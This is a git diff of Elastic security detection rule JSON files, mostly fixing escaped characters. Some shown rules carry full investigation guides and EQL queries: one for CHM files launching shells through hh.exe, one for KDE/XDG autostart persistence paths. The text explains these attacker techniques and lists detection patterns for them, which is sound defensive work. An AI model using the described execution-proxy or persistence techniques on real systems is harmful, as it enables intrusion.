hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json index 2ae4979ea86..f342b31d5f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json index 8deec88761f..c1db9c6734b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json index 18d611321fa..95d3aa05828 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json index 21afbf02937..49b2b144da3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json index 5fd5010fe0a..996245ca54c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json index d0e83d21ed7..957d2ae3773 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json index 4d86fca3bd8..ae9e1096df5 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json index 8930d97bd5f..7629f750984 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json index 3a5ebf76758..995f221e909 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json index 5eca935e461..d99bc55872b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json index 38c207f4fcd..3d98514463c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json index fc1216003b3..5d383f85d94 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via KDE AutoStart Script or Desktop File Modification", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n ) and\n not process.name in (\"yum\", \"dpkg\", \"install\", \"dnf\", \"teams\", \"yum-cron\", \"dnf-automatic\", \"docker\", \"dockerd\", \n \"rpm\")\n", "references": [ "https://userbase.kde.org/System_Settings/Autostart", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json index 94ce9efa03c..fba907f6477 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper 